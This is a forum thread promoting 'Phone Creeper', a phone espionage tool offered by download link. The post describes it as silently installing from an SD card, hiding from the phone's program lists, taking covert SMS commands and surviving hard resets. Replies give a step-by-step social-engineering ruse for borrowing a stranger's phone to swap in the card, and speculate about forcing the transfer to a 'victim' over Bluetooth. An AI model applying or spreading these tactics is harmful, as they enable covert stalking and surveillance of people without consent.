Phone Creeper V0.98

[deleted user]
10 years ago | edited 10 years ago

WHAT IT DOES

This is a phone espionage suite.

It can be silently installed by just inserting an sd card with the files below on it. The program does not show up under installed programs or running programs and allows for a useful array or features. Phones running this software can be remotely controled by sms text messages. All commands will be silently received and deleted immediately and results will be issued back to sender.

pre-configured settings can be added to the installer to have your own default password and phone number to receive live updates. By default, this program will silently reinstall itself even after a hard reset, if the memory card with these files is still in the device.

Phone Creeper V0.98: Link HERE

Remove Creaper: Link HERE

2577 Zip File: Link HERE

Here is the link to the main page: Phone Creeper

13replies
7voices
682views
kamzhik
10 years ago

Interesting. Now we have to find a way to put that sd card into someone’s phone.

Reply has been removed
[paulau]
10 years ago

Hmm did we can send it by bluetooth? :)

Hacked4Fun
10 years ago

Well this is interesting.

[paulau]
10 years ago

Yes but put the card sd into a phone isn’t so easy :\

Phase 1
“Hey, excuse me may I use your phone? I have to call my ride…. Oh, thank you so much”

Phase 2
“Mind if I go over here for a minute? The signal’s cutting out” Turn back to owner, or “Mind if I use the restroom real quick as well?”

Remove sd card, don’t forget to unmount, put new one in, pretend to have a convo for a quick minute.

Viola! See, social engineering and hacking go hand and hand.

[IAmDevil]
10 years ago | edited 10 years ago

Thats a really nice and simple tool.
But the real question here, what platform does it work on? I saw the forum and it only says WM (Wiindows Moblie) which is very old and probably no one uses it in todays date.
Maybe can be more dangerous if we try to make it a multi-platform app (which I don’t think is possible) or we can just try to make it for Android which is the most common OS these days. ?

[paulau]
10 years ago

MaxLockhart ou have right but if we can send it by bluetooth that’s will be more easy no?

Uhhhhhh…. Yeah, if bluetooth is enabled and you pair the devices then maybe that is. If it’s not enabled then you can’t even begin a hacking process. Not to mention if the person isn’t in your range. What if you don’t get in either. I don’t know too much about bluetooth in general so I don’t have much to say there, but it doesn’t sound promising. Not to mention that it would be a pretty LARGE file transfer for bluetooth (meaning a lot of time) and the owner would be prompted. So…. I don’t think so. I think this app might be built for an sd card as well. I haven’t even taken a look at it or plan to lol. So yeah sorry @paulau I don’t think it would work bud

[paulau]
10 years ago

Humm :\ you’ve right :\

[IAmDevil]
10 years ago

Well its surprising that I have'nt looked in Bluetooth tech for a very long while !
And yes its very important that while pairing the victim’s phone should accept the request otherwise its futile!

[paulau]
10 years ago

i think we can find a bluetooth forcer and send the phone creeper no?

[IAmDevil]
10 years ago

Hmm… A Bluetooth forcer? Whats that? I’ll take a look.

[deleted user]
10 years ago

Yes Paulau you can!

Discussion thread has been locked. You can no longer add new posts. Unlock
1 of 14

This site only uses cookies that are essential for the functionality of this website. Cookies are not used for tracking or marketing purposes.

By using our site, you acknowledge that you have read and understand our Privacy Policy, and Terms of Service.

Dismiss